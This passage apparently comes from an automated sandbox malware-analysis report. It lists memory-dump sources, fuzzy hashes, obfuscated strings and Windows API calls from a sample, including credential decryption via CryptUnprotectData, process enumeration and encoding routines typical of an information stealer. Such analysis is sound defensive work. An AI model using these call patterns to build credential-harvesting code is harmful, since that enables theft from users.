                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 7Is{$G>$TNkV$lN$wN?
                        • API String ID: 0-2232020119
                        • Opcode ID: a68daa9b8a01490c3f9601220341e7a15b7c5de5c7c32472e6b00f94845903a9
                        • Instruction ID: c2351524f396135d8b889b97d269e0d5d781591b9c52d65a65e9d3a0aa9c4f79
                        • Opcode Fuzzy Hash: a68daa9b8a01490c3f9601220341e7a15b7c5de5c7c32472e6b00f94845903a9
                        • Instruction Fuzzy Hash: F8A205F39086049FE704AE29EC8567AFBE5EF94320F164A3DEAC5C7344E63598058787
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0026C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0026C87C
                        • lstrcat.KERNEL32(?,00280B46), ref: 0026C943
                        • lstrcat.KERNEL32(?,00280B47), ref: 0026C957
                        • lstrcat.KERNEL32(?,00280B4E), ref: 0026C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 5e6f8ec5916ebf0bd3b0457bbe7425f2ce41f2d52958a010abf35a95d6d58728
                        • Instruction ID: 39deb8d54d365eae0d2babc1cb7152d77bb069345a912bb849561e760a354f3c
                        • Opcode Fuzzy Hash: 5e6f8ec5916ebf0bd3b0457bbe7425f2ce41f2d52958a010abf35a95d6d58728
                        • Instruction Fuzzy Hash: F64171B591421ADBDB10EFA0DD89BFEBBB8BB48304F1041B8E509A7280D7745A94CF91
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 0027696C
                        • sscanf.NTDLL ref: 00276999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002769B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002769C0
                        • ExitProcess.KERNEL32 ref: 002769DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: d8aed5c24500c722b771646e31faa92f4c59303ff3696dbb0924e949169daf33
                        • Instruction ID: 13feed48b48b6eebcbc8cbcbef3796362ae3d058d06b9f34fdc5cd47f9abb24f
                        • Opcode Fuzzy Hash: d8aed5c24500c722b771646e31faa92f4c59303ff3696dbb0924e949169daf33
                        • Instruction Fuzzy Hash: 4621FF75D10209ABCF44EFE4D9499EEBBB5FF48300F04852EE51AE3250EB345618CB69
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0026724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00267254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00267281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002672A4
                        • LocalFree.KERNEL32(?), ref: 002672AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: cb81376887b05c9ac7ceea823e7a0715fe9a5b525c78f60ddceac076bef3b72e
                        • Instruction ID: ea05f43485e0876719304ff0373034879cebf726beb27f6b002a2c1ba00e2ee6
                        • Opcode Fuzzy Hash: cb81376887b05c9ac7ceea823e7a0715fe9a5b525c78f60ddceac076bef3b72e
                        • Instruction Fuzzy Hash: 220112B5A50208BBEB10DFD4DD49F9E7B78EB44B04F104558FB05AB2C0D7B4AA10CB69
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0027961E
                        • Process32First.KERNEL32(00280ACA,00000128), ref: 00279632
                        • Process32Next.KERNEL32(00280ACA,00000128), ref: 00279647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0027965C
                        • CloseHandle.KERNEL32(00280ACA), ref: 0027967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 3b36fbbd21db13875b906ceb63ce224a5e5ea85ed2cd31b7994d37fe604a7581
                        • Instruction ID: e5910ad5c6d6054e02cbc5fe12badfeba248fee9749eec894d6110cb3d5909bb
                        • Opcode Fuzzy Hash: 3b36fbbd21db13875b906ceb63ce224a5e5ea85ed2cd31b7994d37fe604a7581
                        • Instruction Fuzzy Hash: D8011E75A10309EBDB15DFA5CD48BEEBBF8EF48300F108298A90A97240D7759BA4CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: s$00Fm$Aco~$GFJ$*}R
                        • API String ID: 0-1737098953
                        • Opcode ID: 91f6771a3e86d83f1ee4ff6efaad9d0cad6511acf2c9eed8d27db7e8a3adb468
                        • Instruction ID: cceff722333a28a67cf60fdca13e2c369d4e81f1342ae5ff52979464f0486b49
                        • Opcode Fuzzy Hash: 91f6771a3e86d83f1ee4ff6efaad9d0cad6511acf2c9eed8d27db7e8a3adb468
                        • Instruction Fuzzy Hash: 6A82F7B3A0C2049FD704AE2DEC8567AF7E5EF94720F1A893DE6C4C3744EA3558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: n[L$?4W~$?ww$y?9G
                        • API String ID: 0-3159914443
                        • Opcode ID: 7382f1d7f397adc32af04287568f639d84181c9e1a7037fdb9cfed2aa62af338
                        • Instruction ID: 3ce9a2abb83b5cc59306aa42e65913a31578d3185b0b96423b31f156a056e8d2
                        • Opcode Fuzzy Hash: 7382f1d7f397adc32af04287568f639d84181c9e1a7037fdb9cfed2aa62af338
                        • Instruction Fuzzy Hash: 63B217F3A082049FE3046E2DEC8567AFBE9EF94720F1A453DE6C4C7744E63598058697
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00265184,40000001,00000000,00000000,?,00265184), ref: 00278EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: fc0530b2d18c8c0cea0082dd3006a2303e91168c7d4cca52f338b4bfe22cba5d
                        • Instruction ID: 7917a6f9286945fb294210c29e3b78f1d0ce28ee489ae1ee0caabd34d877fcd5
                        • Opcode Fuzzy Hash: fc0530b2d18c8c0cea0082dd3006a2303e91168c7d4cca52f338b4bfe22cba5d
                        • Instruction Fuzzy Hash: 35110A70260205AFDB00CF64D888FAB37A9AF8A710F10D458F9198B250DB75E861DB66
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E2E190,00000000,?,00280E10,00000000,?,00000000,00000000), ref: 00277A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00277A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E2E190,00000000,?,00280E10,00000000,?,00000000,00000000,?), ref: 00277A7D
                        • wsprintfA.USER32 ref: 00277AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: 5f6300ee7c6a3cf92880d40bc890a3ae49dc672f30e8b2b7cf8529f28934f28e
                        • Instruction ID: bbdea9b1f393902f275b7ee409620fb1788f0a1dbf4261e0e37ead8cdb576521
                        • Opcode Fuzzy Hash: 5f6300ee7c6a3cf92880d40bc890a3ae49dc672f30e8b2b7cf8529f28934f28e
                        • Instruction Fuzzy Hash: AB1182B1945218DBEB209F54DC45F59BB78FB05711F1047E9E90A932C0C7745E54CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1w}{$>j_O$[C[z$pz}
                        • API String ID: 0-3808748184
                        • Opcode ID: 8ea0f9d8e95f3a0cd249f947c710c03d6008c08c378747905c083be7311afa5f
                        • Instruction ID: 2eaf806318ad7b9dce78148f8f16e4efcc9d9e8e82972a48138770be6ee080e9
                        • Opcode Fuzzy Hash: 8ea0f9d8e95f3a0cd249f947c710c03d6008c08c378747905c083be7311afa5f
                        • Instruction Fuzzy Hash: C062F5F360C2009FE7046E29EC8577ABBE9EB94360F1A493DEAC4C7744E63598448797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3<1=$@~os$fJw,$F_[
                        • API String ID: 0-3974770112
                        • Opcode ID: 6dd515b07099520e489b37115df7bd78082c5434fa1ae9b440891d7d7c880176
                        • Instruction ID: d948ccb6cf25bb10165879d805bdd2736f15e9c65945ee9a3ab09c46231af366
                        • Opcode Fuzzy Hash: 6dd515b07099520e489b37115df7bd78082c5434fa1ae9b440891d7d7c880176
                        • Instruction Fuzzy Hash: 763228F360C204AFE3086E2DEC4567ABBE9EF94720F1A493DE6C5C7744E63598018693
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: G#_=$e#Q}$'jo
                        • API String ID: 0-2241741446
                        • Opcode ID: c6ce3a9c2121fe49c100aa13d25936595ab8b44cc146024e26cd90d62ce5ff14
                        • Instruction ID: d07770289d98950de8eb6d5400e043397f8668cea0ea8a8d4ae869426e24e9ef
                        • Opcode Fuzzy Hash: c6ce3a9c2121fe49c100aa13d25936595ab8b44cc146024e26cd90d62ce5ff14
                        • Instruction Fuzzy Hash: 1AB206F3A0C2109FE304AE2DEC8567ABBE9EF94320F1A453DEAC5C7744E53598058697
                        APIs
                        • CoCreateInstance.COMBASE(0027E118,00000000,00000001,0027E108,00000000), ref: 00273758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002737B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 9649e5651ef631b6ee48742bf8c96c166033b296021c3333fab16490f8a382db
                        • Instruction ID: fdbccffd5cd89a128e19f91bdc1e9867e8111ef9e52935e7e0bab9455f69b8cc
                        • Opcode Fuzzy Hash: 9649e5651ef631b6ee48742bf8c96c166033b296021c3333fab16490f8a382db
                        • Instruction Fuzzy Hash: CF410A70A50A289FDB24DB58CC95B9BB7B5BB48702F4081D8E60CEB2D0D771AE85CF51
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00269B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00269BA3
                        • LocalFree.KERNEL32(?), ref: 00269BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: d9a205a111ff97c5ab12e79e781120bfd21b8e72e559a1dc525d0eaee7525de9
                        • Instruction ID: c195ed319fa333491e8a0acfbb4b5dde21be21c79cdb5684b70484fa44c846e7
                        • Opcode Fuzzy Hash: d9a205a111ff97c5ab12e79e781120bfd21b8e72e559a1dc525d0eaee7525de9
                        • Instruction Fuzzy Hash: FE110CB8A00209DFDB04DF94D985AAE77B9FF89304F104568E81597350D774AE51CFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 13~$q{[
                        • API String ID: 0-4278803760
                        • Opcode ID: 987ccd37ec5f5cd31e1089373af7747760d1e51c3d74030cb6fd63177738fefe
                        • Instruction ID: 007c06b99e4154358ec3979b15dc29c339fdf5906daa88a9f588c2b62abbec0a
                        • Opcode Fuzzy Hash: 987ccd37ec5f5cd31e1089373af7747760d1e51c3d74030cb6fd63177738fefe
                        • Instruction Fuzzy Hash: 82A207F36082049FE3046E2DEC8567ABBE9EF94720F1A493DEAC4C3744E63598458797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: J?g$Qn[r
                        • API String ID: 0-2505242624
                        • Opcode ID: 2c15854772ac367f9fa96b77186baf03b93a3ef17004cadbb9c896a1e861b313
                        • Instruction ID: 7fcd5024f98d2a1ee866b7e57f366832b1a96f6dabdc7cf0b05eedd46fb627a9
                        • Opcode Fuzzy Hash: 2c15854772ac367f9fa96b77186baf03b93a3ef17004cadbb9c896a1e861b313
                        • Instruction Fuzzy Hash: 21A2E4F3A0C2049FE304AF29EC8567AFBE5EF94720F16492DE6C483744EA3558458B97
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 9r^N$9r^N
                        • API String ID: 0-2535297952
                        • Opcode ID: b28868d0d3bd75243417bdfd282aadb14c6e333e452d9f163ac98efcbfc5bf15
                        • Instruction ID: aa2b012dee8fc61583bf0ccdfa9cb761cbb4634a5360346c797a3f82d4c3098d
                        • Opcode Fuzzy Hash: b28868d0d3bd75243417bdfd282aadb14c6e333e452d9f163ac98efcbfc5bf15
                        • Instruction Fuzzy Hash: 33713BF3A092045FE3046E2DEC4473BFBDADBD4324F26863DDA8487784ED7A58158686
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 4u9:
                        • API String ID: 0-3300871769
                        • Opcode ID: 5c51cce1e74bf0626f22f97a2c24bbadac2cc50a172bb5037479ba92bb2ac714
                        • Instruction ID: c6f746c0ea25265363523ade190db7cf9b2c96cb0ab454342a88827ea5f0c4a3
                        • Opcode Fuzzy Hash: 5c51cce1e74bf0626f22f97a2c24bbadac2cc50a172bb5037479ba92bb2ac714
                        • Instruction Fuzzy Hash: 0951EFB260C314DFC320BE69E84453EB7E4EF90710F26882DE6C687615E2795D81EB53
                        Memory Dump Source
                        • Source File: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                         • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmp
